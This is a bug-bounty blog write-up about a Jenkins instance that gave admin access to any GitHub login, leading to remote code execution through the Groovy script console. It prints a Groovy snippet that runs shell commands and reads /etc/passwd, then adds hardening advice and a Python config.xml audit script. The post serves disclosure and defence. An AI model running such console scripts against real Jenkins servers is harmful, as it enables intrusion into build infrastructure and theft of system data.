September 7, 2018

RCE Unsecure Jenkins Instance | Bug Bounty POC

Hi Guys,

Honestly I was just getting bored and the blog hadn't been updated in a while, so I decided to write this (will share some more recent issues in a few days 🙂)


So I want this write-up to be concise. Let's just say I was checking subdomains of a site and found a subdomain

So by the name I figured it must be a Jenkins instance, so I opened that subdomain and got redirected to the GitHub login page.


But the Jenkins instance lacked any kind of security for users: when I visited it, it simply asked me to log in to the Jenkins instance using my GitHub account. As soon as I logged in to the Jenkins instance I had complete admin access to it, and I was on the Users page.



Now, as many of you already know, a Jenkins instance has a Script page where a user can go and execute Groovy script, and you can also install a plugin called Terminal for it.


So running a simple script such as


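// Command to run on the Jenkins host
def command = "uname -a"
def proc = command.execute()
proc.waitFor()  // wait for the process so exitValue() does not throw

println "Process exit code: ${proc.exitValue()}"
println "Std Err: ${proc.err.text}"
println "Std Out: ${proc.in.text}"

// Read a file from the host's filesystem
String fileContents = new File('/etc/passwd').getText('UTF-8')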


So this Groovy script will execute the command



So at this point you can be sure that you have an RCE in the service and can execute any command you want, so I did that just to be sure.





So I wrote a report about it and sent it to the CTO of the website 🙂 and the issue was mitigated urgently.


  1. Make sure you set the permissions for your Jenkins instance properly
  2. Make sure to only allow trusted users to install plugins or use Groovy script
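
One way to check for the permission problem in point 1 offline, as an added example (not code from the original post or the Jenkins project): it reads a Jenkins config.xml and flags authorization strategies that give administrator rights, and with them the Script page, to every logged-in or anonymous user. The post does not say which strategy the affected instance used; the two sample configs are constructed, and the class names are assumed to be the ones written by Jenkins core, the matrix-auth plugin and the GitHub OAuth plugin.

```python
import xml.etree.ElementTree as ET

GITHUB_REALM = "org.jenkinsci.plugins.GithubSecurityRealm"  # GitHub OAuth plugin
LOCAL_REALM = "hudson.security.HudsonPrivateSecurityRealm"  # Jenkins' own user database
OPEN_STRATEGIES = {
    "hudson.security.AuthorizationStrategy$Unsecured":
        "anyone can do anything without logging in",
    "hudson.security.FullControlOnceLoggedInAuthorizationStrategy":
        "every logged-in user is an administrator",
}
BROAD_SIDS = {"anonymous", "authenticated"}
ADMIN_PERMS = {"hudson.model.Hudson.Administer", "hudson.model.Hudson.RunScripts"}

def anyone_can_get_an_account(realm):
    """True when the realm accepts any GitHub account or allows self sign-up."""
    cls = realm.get("class", "") if realm is not None else ""
    signup = realm.findtext("disableSignup") if realm is not None else None
    return cls == GITHUB_REALM or (cls == LOCAL_REALM and signup == "false")

def audit(config_xml):
    """Return findings for strategies that give broad groups admin rights."""
    root = ET.fromstring(config_xml)
    strategy = root.find("authorizationStrategy")
    cls = strategy.get("class", "") if strategy is not None else ""
    findings = []
    if cls in OPEN_STRATEGIES:
        msg = OPEN_STRATEGIES[cls]
        if anyone_can_get_an_account(root.find("securityRealm")):
            msg += "; the security realm lets anyone obtain a login"
        findings.append(msg)
    elif cls.endswith("MatrixAuthorizationStrategy"):
        for entry in strategy.findall("permission"):
            # "PERM:sid" (older) or "GROUP:PERM:sid" (newer matrix-auth format)
            parts = (entry.text or "").strip().split(":")
            if len(parts) >= 2 and parts[-2] in ADMIN_PERMS and parts[-1] in BROAD_SIDS:
                findings.append(f"{parts[-2]} is granted to '{parts[-1]}'")
    return findings

# Constructed sample configs (not taken from the affected site).
WEAK = """<hudson>
  <authorizationStrategy class="hudson.security.FullControlOnceLoggedInAuthorizationStrategy"/>
  <securityRealm class="org.jenkinsci.plugins.GithubSecurityRealm"/>
</hudson>"""
HARDENED = """<hudson>
  <authorizationStrategy class="hudson.security.GlobalMatrixAuthorizationStrategy">
    <permission>hudson.model.Hudson.Administer:alice</permission>
    <permission>hudson.model.Hudson.Read:authenticated</permission>
  </authorizationStrategy>
</hudson>"""
```

Calling audit(WEAK) returns one finding and audit(HARDENED) returns an empty list; on a real controller the input is config.xml in the Jenkins home directory.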

Do read the detailed post by nahamsec

Note: The issue was reported and has been mitigated. The blog was written after getting permission from the CTO Matt ( ) 🙂, and the site DoSomething doesn't have a bug bounty program anymore, so kindly avoid any kind of testing.


Thanks for Reading ^_^
